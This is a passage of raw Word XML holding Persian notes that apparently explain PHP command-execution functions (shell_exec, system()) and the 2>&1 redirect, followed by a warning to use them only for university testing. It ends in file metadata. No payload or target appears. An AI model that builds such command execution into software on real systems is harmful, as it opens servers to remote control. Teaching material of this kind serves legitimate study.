        <w:t xml:space="preserve"> بودن</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t>- `</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">)`: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>روش سوم اجرا</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">- `2&gt;&amp;1`: </w:t>
      </w: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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stderr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>با</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911"/>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>فقط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تست دانشگاه استفاده کن</w:t>
      </w:r>
      <w:r>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911"/>
    <w:p w:rsidR="00CD2383" w:rsidRDefault="00880911" w:rsidP="00880911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همون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</w:p>
    <w:sectPr w:rsidR="00CD2383" w:rsidSect="00E16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80911"/>
    <w:rsid w:val="00841E88"/>
    <w:rsid w:val="00880911"/>
    <w:rsid w:val="009E1D25"/>
    <w:rsid w:val="00CD2383"/>
    <w:rsid w:val="00E1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2320</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>19</Lines>
  <Paragraphs>5</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>MRT www.Win2Farsi.com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 Sadat</dc:creator>
  <cp:lastModifiedBy>Hasib Sadat</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-29T22:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-29T22:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>